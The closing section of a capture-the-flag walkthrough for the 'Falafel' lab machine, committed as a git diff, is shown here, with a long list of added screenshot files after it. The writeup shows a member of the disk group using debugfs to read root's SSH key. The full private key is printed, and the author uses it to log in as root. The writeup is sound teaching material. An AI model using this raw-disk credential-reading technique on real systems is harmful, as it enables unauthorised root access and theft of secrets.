+ → ssh yossi@10.10.10.73
+ yossi@10.10.10.73's password:
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Dec 21 12:39:26 2020
+ yossi@falafel:~$ ls -lash
+ total 24K
+ 4.0K drwx------ 3 yossi yossi 4.0K Jan 14 2018 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 27 2017 ..
+ 0 -rw------- 1 root root 0 Jan 14 2018 .bash_history
+ 4.0K -rw-r--r-- 1 yossi yossi 220 Nov 27 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 yossi yossi 3.7K Nov 27 2017 .bashrc
+ 4.0K drwx------ 2 yossi yossi 4.0K Nov 27 2017 .cache
+ 4.0K -rw-r--r-- 1 yossi yossi 655 Nov 27 2017 .profile
+
+ yossi@falafel:~$ id
+ uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
+
+
+And here we see something interesting, yossi is part of the disk group, which theorically means he can read whatever is on the disks
+
+
+
+ yossi@falafel:~$ strings /dev/sda1 | grep root.txt
+ <****file:Documentation/filesystems/nfs/nfsroot.txt>. <****file:Documentation/filesystems/nfs/nfsroot.txt> for details.
+ Read <****file:Documentation/filesystems/nfs/nfsroot.txt> for details. <****file:Documentation/filesystems/nfs/nfsroot.txt> for details. <****file:Documentation/filesystems/nfs/nfsroot.txt>.
+
+However the intended path is to use the debugfs command:
+
+
+
+ yossi@falafel:~$ debugfs /dev/sda1
+ debugfs 1.42.13 (17-May-2015)
+ debugfs: ls
+ debugfs: cd root
+ debugfs: ls
+ debugfs: cd .ssh
+ debugfs: cat id_rsa
+ -----BEGIN RSA PRIVATE KEY-----
+ MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
+ b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
+ v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
+ BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
+ UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
+ dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
+ eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
+ gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+ +7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
+ /YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
+ OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
+ kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
+ UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
+ ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
+ GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
+ 5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
+ f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
+ xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
+ HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
+ BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
+ k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
+ HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
+ M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
+ NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
+ FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
+ -----END RSA PRIVATE KEY-----
+
+
+
+And basically here, you've managed to get the root user's private ssh key, so just save it locally, give it the correct permissions, and login as root via ssh:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → vim id_rsa
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → ssh root@10.10.10.73 -i id_rsa
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Dec 21 16:47:49 2020 from 10.10.14.16
+ root@falafel:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@falafel:~# ls -lash
+ total 36K
+ 4.0K drwxr-x--- 5 root root 4.0K Feb 5 2018 .
+ 4.0K drwxr-xr-x 23 root root 4.0K Feb 5 2018 ..
+ 0 -rw------- 1 root root 0 Jan 14 2018 .bash_history
+ 4.0K -rw------- 1 root root 3.1K Nov 27 2017 .bashrc
+ 4.0K drwx------ 2 root root 4.0K Nov 27 2017 .cache
+ 4.0K drwxr-xr-x 2 root root 4.0K Jan 15 2018 .nano
+ 4.0K -rw------- 1 root root 148 Aug 17 2015 .profile
+ 4.0K -r-------- 1 root root 33 Nov 27 2017 root.txt
+ 4.0K drwxr-xr-x 2 root root 4.0K Jan 15 2018 .ssh
+ 4.0K -rw-r--r-- 1 root root 206 Feb 5 2018 .wget-hsts
+ root@falafel:~# cat root.txt
+
+ 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we have it! We have been able to print out the root flag of this box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Hard/img/0.png b/Hard/img/0.png
new file mode 100644
index 0000000..65b7216
Binary files /dev/null and b/Hard/img/0.png differ
diff --git a/Hard/img/0_graph.png b/Hard/img/0_graph.png
new file mode 100644
index 0000000..a711049
Binary files /dev/null and b/Hard/img/0_graph.png differ
diff --git a/Hard/img/1.png b/Hard/img/1.png
new file mode 100644
index 0000000..f63f9fb
Binary files /dev/null and b/Hard/img/1.png differ
diff --git a/Hard/img/10.png b/Hard/img/10.png
new file mode 100644
index 0000000..fc8641e
Binary files /dev/null and b/Hard/img/10.png differ
diff --git a/Hard/img/10_graph.png b/Hard/img/10_graph.png
new file mode 100644
index 0000000..800d976
Binary files /dev/null and b/Hard/img/10_graph.png differ
diff --git a/Hard/img/11.png b/Hard/img/11.png
new file mode 100644
index 0000000..37bb818
Binary files /dev/null and b/Hard/img/11.png differ
diff --git a/Hard/img/12.png b/Hard/img/12.png
new file mode 100644
index 0000000..8c23170
Binary files /dev/null and b/Hard/img/12.png differ
diff --git a/Hard/img/13.png b/Hard/img/13.png
new file mode 100644
index 0000000..d27be83
Binary files /dev/null and b/Hard/img/13.png differ
diff --git a/Hard/img/14.png b/Hard/img/14.png
new file mode 100644
index 0000000..ab95758
Binary files /dev/null and b/Hard/img/14.png differ
diff --git a/Hard/img/15.png b/Hard/img/15.png
new file mode 100644
index 0000000..0a2c68c
Binary files /dev/null and b/Hard/img/15.png differ
diff --git a/Hard/img/16.png b/Hard/img/16.png
new file mode 100644
index 0000000..58f897f
Binary files /dev/null and b/Hard/img/16.png differ
diff --git a/Hard/img/17.png b/Hard/img/17.png
new file mode 100644
index 0000000..cbc0f43
Binary files /dev/null and b/Hard/img/17.png differ
diff --git a/Hard/img/18.png b/Hard/img/18.png
new file mode 100644
index 0000000..8dc7ae4
Binary files /dev/null and b/Hard/img/18.png differ
diff --git a/Hard/img/19.png b/Hard/img/19.png
new file mode 100644
index 0000000..62f2494
Binary files /dev/null and b/Hard/img/19.png differ
diff --git a/Hard/img/2.png b/Hard/img/2.png
new file mode 100644
index 0000000..f060c57
Binary files /dev/null and b/Hard/img/2.png differ
diff --git a/Hard/img/20.png b/Hard/img/20.png
new file mode 100644
index 0000000..db810eb
Binary files /dev/null and b/Hard/img/20.png differ
diff --git a/Hard/img/21.png b/Hard/img/21.png
new file mode 100644
index 0000000..7487b78
Binary files /dev/null and b/Hard/img/21.png differ
diff --git a/Hard/img/22.png b/Hard/img/22.png
new file mode 100644
index 0000000..1be424b
Binary files /dev/null and b/Hard/img/22.png differ
diff --git a/Hard/img/23.png b/Hard/img/23.png
new file mode 100644
index 0000000..9b64961
Binary files /dev/null and b/Hard/img/23.png differ
diff --git a/Hard/img/24.png b/Hard/img/24.png
new file mode 100644
index 0000000..d060e3e
Binary files /dev/null and b/Hard/img/24.png differ
diff --git a/Hard/img/25.png b/Hard/img/25.png
new file mode 100644
index 0000000..303e5a5
Binary files /dev/null and b/Hard/img/25.png differ
diff --git a/Hard/img/26.png b/Hard/img/26.png
new file mode 100644
index 0000000..c20ca1b
Binary files /dev/null and b/Hard/img/26.png differ
diff --git a/Hard/img/27.png b/Hard/img/27.png
new file mode 100644
index 0000000..218c60a
Binary files /dev/null and b/Hard/img/27.png differ
diff --git a/Hard/img/28.png b/Hard/img/28.png
new file mode 100644
index 0000000..66e98c9
Binary files /dev/null and b/Hard/img/28.png differ
diff --git a/Hard/img/29.png b/Hard/img/29.png
new file mode 100644
index 0000000..2674227
Binary files /dev/null and b/Hard/img/29.png differ
diff --git a/Hard/img/2_graph.png b/Hard/img/2_graph.png
new file mode 100644
index 0000000..df96857
Binary files /dev/null and b/Hard/img/2_graph.png differ
diff --git a/Hard/img/3.png b/Hard/img/3.png
new file mode 100644
index 0000000..923ec72
Binary files /dev/null and b/Hard/img/3.png differ
diff --git a/Hard/img/30.png b/Hard/img/30.png
new file mode 100644
index 0000000..484bf6e
Binary files /dev/null and b/Hard/img/30.png differ
diff --git a/Hard/img/31.png b/Hard/img/31.png
new file mode 100644
index 0000000..ed91d09
Binary files /dev/null and b/Hard/img/31.png differ
diff --git a/Hard/img/32.png b/Hard/img/32.png
new file mode 100644
index 0000000..f6c4144
Binary files /dev/null and b/Hard/img/32.png differ
diff --git a/Hard/img/33.png b/Hard/img/33.png
new file mode 100644
index 0000000..d57fc52
Binary files /dev/null and b/Hard/img/33.png differ
diff --git a/Hard/img/34.png b/Hard/img/34.png
new file mode 100644
index 0000000..bfaba4d
Binary files /dev/null and b/Hard/img/34.png differ
diff --git a/Hard/img/35.png b/Hard/img/35.png
new file mode 100644
index 0000000..4fd0337
Binary files /dev/null and b/Hard/img/35.png differ
diff --git a/Hard/img/36.png b/Hard/img/36.png
new file mode 100644
index 0000000..7e63820
Binary files /dev/null and b/Hard/img/36.png differ
diff --git a/Hard/img/37.png b/Hard/img/37.png
new file mode 100644
index 0000000..24d81a5
Binary files /dev/null and b/Hard/img/37.png differ
diff --git a/Hard/img/38.png b/Hard/img/38.png
new file mode 100644
index 0000000..4e7d6e3
Binary files /dev/null and b/Hard/img/38.png differ
diff --git a/Hard/img/39.png b/Hard/img/39.png
new file mode 100644
index 0000000..3acc319
Binary files /dev/null and b/Hard/img/39.png differ
diff --git a/Hard/img/3_graph.png b/Hard/img/3_graph.png
new file mode 100644
index 0000000..9faca42
Binary files /dev/null and b/Hard/img/3_graph.png differ
diff --git a/Hard/img/4.png b/Hard/img/4.png
new file mode 100644
index 0000000..f1d5984
Binary files /dev/null and b/Hard/img/4.png differ
diff --git a/Hard/img/4_graph.png b/Hard/img/4_graph.png
new file mode 100644
index 0000000..835c2e3
Binary files /dev/null and b/Hard/img/4_graph.png differ
diff --git a/Hard/img/5.png b/Hard/img/5.png
new file mode 100644
index 0000000..486ac82
Binary files /dev/null and b/Hard/img/5.png differ
diff --git a/Hard/img/5_graph.png b/Hard/img/5_graph.png
new file mode 100644
index 0000000..e67ac88
Binary files /dev/null and b/Hard/img/5_graph.png differ
diff --git a/Hard/img/6.png b/Hard/img/6.png
new file mode 100644
index 0000000..b344bb2
Binary files /dev/null and b/Hard/img/6.png differ
diff --git a/Hard/img/6_graph.png b/Hard/img/6_graph.png
new file mode 100644
index 0000000..8bc149c
Binary files /dev/null and b/Hard/img/6_graph.png differ
diff --git a/Hard/img/7.png b/Hard/img/7.png
new file mode 100644
index 0000000..3a4f83a
Binary files /dev/null and b/Hard/img/7.png differ
diff --git a/Hard/img/7_graph.png b/Hard/img/7_graph.png
new file mode 100644
index 0000000..d7766fa
Binary files /dev/null and b/Hard/img/7_graph.png differ
diff --git a/Hard/img/8.png b/Hard/img/8.png
new file mode 100644
index 0000000..878ef38
Binary files /dev/null and b/Hard/img/8.png differ
diff --git a/Hard/img/8_graph.png b/Hard/img/8_graph.png
new file mode 100644
index 0000000..d62c965
Binary files /dev/null and b/Hard/img/8_graph.png differ
diff --git a/Hard/img/9.png b/Hard/img/9.png
new file mode 100644
index 0000000..c55b0c9
Binary files /dev/null and b/Hard/img/9.png differ
diff --git a/Hard/img/9_graph.png b/Hard/img/9_graph.png
new file mode 100644
index 0000000..4939276
Binary files /dev/null and b/Hard/img/9_graph.png differ
diff --git a/Hard/prg/1/001.png b/Hard/prg/1/001.png
new file mode 100644
index 0000000..87cf6cf
Binary files /dev/null and b/Hard/prg/1/001.png differ
diff --git a/Hard/prg/1/002.png b/Hard/prg/1/002.png
new file mode 100644
index 0000000..55f8dca
Binary files /dev/null and b/Hard/prg/1/002.png differ
diff --git a/Hard/prg/1/003.png b/Hard/prg/1/003.png
new file mode 100644
index 0000000..2b453e3
Binary files /dev/null and b/Hard/prg/1/003.png differ
diff --git a/Hard/prg/1/004.png b/Hard/prg/1/004.png
new file mode 100644
index 0000000..75cb884
Binary files /dev/null and b/Hard/prg/1/004.png differ
diff --git a/Hard/prg/1/005.png b/Hard/prg/1/005.png
new file mode 100644
index 0000000..ba313cd
Binary files /dev/null and b/Hard/prg/1/005.png differ
diff --git a/Hard/prg/1/006.png b/Hard/prg/1/006.png
new file mode 100644
index 0000000..ae4c329
Binary files /dev/null and b/Hard/prg/1/006.png differ
diff --git a/Hard/prg/1/007.png b/Hard/prg/1/007.png
new file mode 100644
index 0000000..f399b2c
Binary files /dev/null and b/Hard/prg/1/007.png differ
diff --git a/Hard/prg/1/008.png b/Hard/prg/1/008.png
new file mode 100644
index 0000000..cfa82da
Binary files /dev/null and b/Hard/prg/1/008.png differ
diff --git a/Hard/prg/1/009.png b/Hard/prg/1/009.png
new file mode 100644
index 0000000..4dcf3ab
Binary files /dev/null and b/Hard/prg/1/009.png differ
diff --git a/Hard/prg/1/010.png b/Hard/prg/1/010.png
new file mode 100644
index 0000000..fda2ba9
Binary files /dev/null and b/Hard/prg/1/010.png differ
diff --git a/Hard/prg/1/011.png b/Hard/prg/1/011.png
new file mode 100644
index 0000000..a73f6b9
Binary files /dev/null and b/Hard/prg/1/011.png differ
diff --git a/Hard/prg/1/012.png b/Hard/prg/1/012.png
new file mode 100644
index 0000000..4f3a46f
Binary files /dev/null and b/Hard/prg/1/012.png differ
diff --git a/Hard/prg/1/013.png b/Hard/prg/1/013.png
new file mode 100644
index 0000000..a3dd460
Binary files /dev/null and b/Hard/prg/1/013.png differ
diff --git a/Hard/prg/1/014.png b/Hard/prg/1/014.png
new file mode 100644
index 0000000..f5cdb19
Binary files /dev/null and b/Hard/prg/1/014.png differ
diff --git a/Hard/prg/10/1.png b/Hard/prg/10/1.png
new file mode 100644
index 0000000..f7aad63
Binary files /dev/null and b/Hard/prg/10/1.png differ
diff --git a/Hard/prg/10/2.png b/Hard/prg/10/2.png
new file mode 100644
index 0000000..e275656
Binary files /dev/null and b/Hard/prg/10/2.png differ
diff --git a/Hard/prg/10/3.png b/Hard/prg/10/3.png
new file mode 100644
index 0000000..f545908
Binary files /dev/null and b/Hard/prg/10/3.png differ
diff --git a/Hard/prg/10/4.png b/Hard/prg/10/4.png
new file mode 100644
index 0000000..0e4bb95
Binary files /dev/null and b/Hard/prg/10/4.png differ
diff --git a/Hard/prg/10/5.png b/Hard/prg/10/5.png
new file mode 100644
index 0000000..dd6c103
Binary files /dev/null and b/Hard/prg/10/5.png differ
diff --git a/Hard/prg/10/6.png b/Hard/prg/10/6.png
new file mode 100644
index 0000000..43c3217
Binary files /dev/null and b/Hard/prg/10/6.png differ
diff --git a/Hard/prg/11/0.png b/Hard/prg/11/0.png
new file mode 100644
index 0000000..e485af5
Binary files /dev/null and b/Hard/prg/11/0.png differ
diff --git a/Hard/prg/11/1.png b/Hard/prg/11/1.png
new file mode 100644
index 0000000..4143127
Binary files /dev/null and b/Hard/prg/11/1.png differ
diff --git a/Hard/prg/11/2.png b/Hard/prg/11/2.png
new file mode 100644
index 0000000..ef27b3e
Binary files /dev/null and b/Hard/prg/11/2.png differ
diff --git a/Hard/prg/11/3.png b/Hard/prg/11/3.png
new file mode 100644
index 0000000..1782b27
Binary files /dev/null and b/Hard/prg/11/3.png differ
diff --git a/Hard/prg/11/4.png b/Hard/prg/11/4.png
new file mode 100644
index 0000000..0bcef5a
Binary files /dev/null and b/Hard/prg/11/4.png differ
diff --git a/Hard/prg/11/5.png b/Hard/prg/11/5.png
new file mode 100644
index 0000000..d4d24ed
Binary files /dev/null and b/Hard/prg/11/5.png differ
diff --git a/Hard/prg/11/6.png b/Hard/prg/11/6.png
new file mode 100644
index 0000000..60835e9
Binary files /dev/null and b/Hard/prg/11/6.png differ
diff --git a/Hard/prg/12/1.png b/Hard/prg/12/1.png
new file mode 100644
index 0000000..53a002d
Binary files /dev/null and b/Hard/prg/12/1.png differ
diff --git a/Hard/prg/12/10.png b/Hard/prg/12/10.png
new file mode 100644
index 0000000..d95e17c
Binary files /dev/null and b/Hard/prg/12/10.png differ
diff --git a/Hard/prg/12/11.png b/Hard/prg/12/11.png
new file mode 100644
index 0000000..68d3ea7
Binary files /dev/null and b/Hard/prg/12/11.png differ
diff --git a/Hard/prg/12/12.png b/Hard/prg/12/12.png
new file mode 100644
index 0000000..f2235b3
Binary files /dev/null and b/Hard/prg/12/12.png differ
diff --git a/Hard/prg/12/13.png b/Hard/prg/12/13.png
new file mode 100644
index 0000000..8a03d56
Binary files /dev/null and b/Hard/prg/12/13.png differ
diff --git a/Hard/prg/12/14.png b/Hard/prg/12/14.png
new file mode 100644
index 0000000..0f72a91
Binary files /dev/null and b/Hard/prg/12/14.png differ
diff --git a/Hard/prg/12/15.png b/Hard/prg/12/15.png
new file mode 100644
index 0000000..6f4a429
Binary files /dev/null and b/Hard/prg/12/15.png differ
diff --git a/Hard/prg/12/16.png b/Hard/prg/12/16.png
new file mode 100644
index 0000000..50b84b0
Binary files /dev/null and b/Hard/prg/12/16.png differ
diff --git a/Hard/prg/12/17.png b/Hard/prg/12/17.png
new file mode 100644
index 0000000..3d68ea1
Binary files /dev/null and b/Hard/prg/12/17.png differ
diff --git a/Hard/prg/12/18.png b/Hard/prg/12/18.png
new file mode 100644
index 0000000..d33e1fe
Binary files /dev/null and b/Hard/prg/12/18.png differ
diff --git a/Hard/prg/12/19.png b/Hard/prg/12/19.png
new file mode 100644
index 0000000..29947d7
Binary files /dev/null and b/Hard/prg/12/19.png differ
diff --git a/Hard/prg/12/2.png b/Hard/prg/12/2.png
new file mode 100644
index 0000000..7ab81b0
Binary files /dev/null and b/Hard/prg/12/2.png differ
diff --git a/Hard/prg/12/20.png b/Hard/prg/12/20.png
new file mode 100644
index 0000000..6005a99
Binary files /dev/null and b/Hard/prg/12/20.png differ
diff --git a/Hard/prg/12/21.png b/Hard/prg/12/21.png
new file mode 100644
index 0000000..64bff75
Binary files /dev/null and b/Hard/prg/12/21.png differ
diff --git a/Hard/prg/12/22.png b/Hard/prg/12/22.png
new file mode 100644
index 0000000..451fc3d
Binary files /dev/null and b/Hard/prg/12/22.png differ
diff --git a/Hard/prg/12/3.png b/Hard/prg/12/3.png
new file mode 100644
index 0000000..947dcaf
Binary files /dev/null and b/Hard/prg/12/3.png differ
diff --git a/Hard/prg/12/4.png b/Hard/prg/12/4.png
new file mode 100644
index 0000000..ce2be83
Binary files /dev/null and b/Hard/prg/12/4.png differ
diff --git a/Hard/prg/12/5.png b/Hard/prg/12/5.png
new file mode 100644
index 0000000..b963bf2
Binary files /dev/null and b/Hard/prg/12/5.png differ
diff --git a/Hard/prg/12/6.png b/Hard/prg/12/6.png
new file mode 100644
index 0000000..cd54b4c
Binary files /dev/null and b/Hard/prg/12/6.png differ
diff --git a/Hard/prg/12/7.png b/Hard/prg/12/7.png
new file mode 100644
index 0000000..cc4563e
Binary files /dev/null and b/Hard/prg/12/7.png differ
diff --git a/Hard/prg/12/8.png b/Hard/prg/12/8.png
new file mode 100644
index 0000000..a4f2903
Binary files /dev/null and b/Hard/prg/12/8.png differ
diff --git a/Hard/prg/12/9.png b/Hard/prg/12/9.png
new file mode 100644
index 0000000..bf85ab5
Binary files /dev/null and b/Hard/prg/12/9.png differ
diff --git a/Hard/prg/13/1.png b/Hard/prg/13/1.png
new file mode 100644
index 0000000..4ef11ba
Binary files /dev/null and b/Hard/prg/13/1.png differ
diff --git a/Hard/prg/13/2.png b/Hard/prg/13/2.png
new file mode 100644
index 0000000..c8a79b6
Binary files /dev/null and b/Hard/prg/13/2.png differ
diff --git a/Hard/prg/13/3.png b/Hard/prg/13/3.png
new file mode 100644
index 0000000..5473646
Binary files /dev/null and b/Hard/prg/13/3.png differ
diff --git a/Hard/prg/13/4.png b/Hard/prg/13/4.png
new file mode 100644
index 0000000..4d63b17
Binary files /dev/null and b/Hard/prg/13/4.png differ
diff --git a/Hard/prg/13/5.png b/Hard/prg/13/5.png
new file mode 100644
index 0000000..a3dbcf8
Binary files /dev/null and b/Hard/prg/13/5.png differ
diff --git a/Hard/prg/2/001.png b/Hard/prg/2/001.png
new file mode 100644
index 0000000..5c693a7
Binary files /dev/null and b/Hard/prg/2/001.png differ
diff --git a/Hard/prg/2/002.png b/Hard/prg/2/002.png
new file mode 100644
index 0000000..8b0cba4
Binary files /dev/null and b/Hard/prg/2/002.png differ
diff --git a/Hard/prg/2/003.png b/Hard/prg/2/003.png
new file mode 100644
index 0000000..bfe5489
Binary files /dev/null and b/Hard/prg/2/003.png differ
diff --git a/Hard/prg/2/004.png b/Hard/prg/2/004.png
new file mode 100644
index 0000000..26849c4
Binary files /dev/null and b/Hard/prg/2/004.png differ
diff --git a/Hard/prg/2/005.png b/Hard/prg/2/005.png
new file mode 100644
index 0000000..0a47c49
Binary files /dev/null and b/Hard/prg/2/005.png differ
diff --git a/Hard/prg/2/006.png b/Hard/prg/2/006.png
new file mode 100644
index 0000000..0c1e363
Binary files /dev/null and b/Hard/prg/2/006.png differ
diff --git a/Hard/prg/2/007.png b/Hard/prg/2/007.png
new file mode 100644
index 0000000..72efcca
Binary files /dev/null and b/Hard/prg/2/007.png differ
diff --git a/Hard/prg/2/008.png b/Hard/prg/2/008.png
new file mode 100644
index 0000000..bee68ef
Binary files /dev/null and b/Hard/prg/2/008.png differ
diff --git a/Hard/prg/2/009.png b/Hard/prg/2/009.png
new file mode 100644
index 0000000..6463df6
Binary files /dev/null and b/Hard/prg/2/009.png differ
diff --git a/Hard/prg/2/010.png b/Hard/prg/2/010.png
new file mode 100644
index 0000000..65089a4
Binary files /dev/null and b/Hard/prg/2/010.png differ
diff --git a/Hard/prg/2/011.png b/Hard/prg/2/011.png
new file mode 100644
index 0000000..b084ccd
Binary files /dev/null and b/Hard/prg/2/011.png differ
diff --git a/Hard/prg/2/012.png b/Hard/prg/2/012.png
new file mode 100644
index 0000000..c2361ff
Binary files /dev/null and b/Hard/prg/2/012.png differ
diff --git a/Hard/prg/2/013.png b/Hard/prg/2/013.png
new file mode 100644
index 0000000..28b7b64
Binary files /dev/null and b/Hard/prg/2/013.png differ
diff --git a/Hard/prg/2/014.png b/Hard/prg/2/014.png
new file mode 100644
index 0000000..eda4f0c
Binary files /dev/null and b/Hard/prg/2/014.png differ
diff --git a/Hard/prg/2/015.png b/Hard/prg/2/015.png
new file mode 100644
index 0000000..cacf83d
Binary files /dev/null and b/Hard/prg/2/015.png differ
diff --git a/Hard/prg/2/016.png b/Hard/prg/2/016.png
new file mode 100644
index 0000000..699bd18
Binary files /dev/null and b/Hard/prg/2/016.png differ
diff --git a/Hard/prg/3/001.png b/Hard/prg/3/001.png
new file mode 100644
index 0000000..565f6ff
Binary files /dev/null and b/Hard/prg/3/001.png differ
diff --git a/Hard/prg/3/002.png b/Hard/prg/3/002.png
new file mode 100644
index 0000000..d90bca3
Binary files /dev/null and b/Hard/prg/3/002.png differ
diff --git a/Hard/prg/3/003.png b/Hard/prg/3/003.png
new file mode 100644
index 0000000..d88dfa1
Binary files /dev/null and b/Hard/prg/3/003.png differ
diff --git a/Hard/prg/3/004.png b/Hard/prg/3/004.png
new file mode 100644
index 0000000..fa232f3
Binary files /dev/null and b/Hard/prg/3/004.png differ
diff --git a/Hard/prg/3/005.png b/Hard/prg/3/005.png
new file mode 100644
index 0000000..73cff6c
Binary files /dev/null and b/Hard/prg/3/005.png differ
diff --git a/Hard/prg/3/006.png b/Hard/prg/3/006.png
new file mode 100644
index 0000000..f034dcb
Binary files /dev/null and b/Hard/prg/3/006.png differ
diff --git a/Hard/prg/3/007.png b/Hard/prg/3/007.png
new file mode 100644
index 0000000..e11aba1
Binary files /dev/null and b/Hard/prg/3/007.png differ
diff --git a/Hard/prg/3/008.png b/Hard/prg/3/008.png
new file mode 100644
index 0000000..7459660
Binary files /dev/null and b/Hard/prg/3/008.png differ
diff --git a/Hard/prg/3/009.png b/Hard/prg/3/009.png
new file mode 100644
index 0000000..394690e
Binary files /dev/null and b/Hard/prg/3/009.png differ
diff --git a/Hard/prg/3/010.png b/Hard/prg/3/010.png
new file mode 100644
index 0000000..cf77d2b
Binary files /dev/null and b/Hard/prg/3/010.png differ
diff --git a/Hard/prg/3/011.png b/Hard/prg/3/011.png
new file mode 100644
index 0000000..f3fe46e
Binary files /dev/null and b/Hard/prg/3/011.png differ
diff --git a/Hard/prg/3/012.png b/Hard/prg/3/012.png
new file mode 100644
index 0000000..2eeb895
Binary files /dev/null and b/Hard/prg/3/012.png differ
diff --git a/Hard/prg/3/013.png b/Hard/prg/3/013.png
new file mode 100644
index 0000000..fcb50ec
Binary files /dev/null and b/Hard/prg/3/013.png differ
diff --git a/Hard/prg/3/014.png b/Hard/prg/3/014.png
new file mode 100644
index 0000000..0a35b91
Binary files /dev/null and b/Hard/prg/3/014.png differ
diff --git a/Hard/prg/3/015.png b/Hard/prg/3/015.png
new file mode 100644
index 0000000..7313575
Binary files /dev/null and b/Hard/prg/3/015.png differ
diff --git a/Hard/prg/3/016.png b/Hard/prg/3/016.png
new file mode 100644
index 0000000..c5896f9
Binary files /dev/null and b/Hard/prg/3/016.png differ
diff --git a/Hard/prg/3/017.png b/Hard/prg/3/017.png
new file mode 100644
index 0000000..b54db48
Binary files /dev/null and b/Hard/prg/3/017.png differ
diff --git a/Hard/prg/3/018.png b/Hard/prg/3/018.png
new file mode 100644
index 0000000..323b06e
Binary files /dev/null and b/Hard/prg/3/018.png differ
diff --git a/Hard/prg/3/019.png b/Hard/prg/3/019.png
new file mode 100644
index 0000000..2d1ce54
Binary files /dev/null and b/Hard/prg/3/019.png differ
diff --git a/Hard/prg/3/020.png b/Hard/prg/3/020.png
new file mode 100644
index 0000000..0da41a6
Binary files /dev/null and b/Hard/prg/3/020.png differ
diff --git a/Hard/prg/3/021.png b/Hard/prg/3/021.png
new file mode 100644
index 0000000..8849c73
Binary files /dev/null and b/Hard/prg/3/021.png differ
diff --git a/Hard/prg/3/022.png b/Hard/prg/3/022.png
new file mode 100644
index 0000000..671640b
Binary files /dev/null and b/Hard/prg/3/022.png differ
diff --git a/Hard/prg/3/023.png b/Hard/prg/3/023.png
new file mode 100644
index 0000000..788c0f9
Binary files /dev/null and b/Hard/prg/3/023.png differ
diff --git a/Hard/prg/3/024.png b/Hard/prg/3/024.png
new file mode 100644
index 0000000..2be0e0f
Binary files /dev/null and b/Hard/prg/3/024.png differ
diff --git a/Hard/prg/3/025.png b/Hard/prg/3/025.png
new file mode 100644
index 0000000..96761f5
Binary files /dev/null and b/Hard/prg/3/025.png differ
diff --git a/Hard/prg/3/026.png b/Hard/prg/3/026.png
new file mode 100644
index 0000000..da9d4be
Binary files /dev/null and b/Hard/prg/3/026.png differ
diff --git a/Hard/prg/3/027.png b/Hard/prg/3/027.png
new file mode 100644
index 0000000..6babb52
Binary files /dev/null and b/Hard/prg/3/027.png differ
diff --git a/Hard/prg/3/028.png b/Hard/prg/3/028.png
new file mode 100644
index 0000000..3a694db
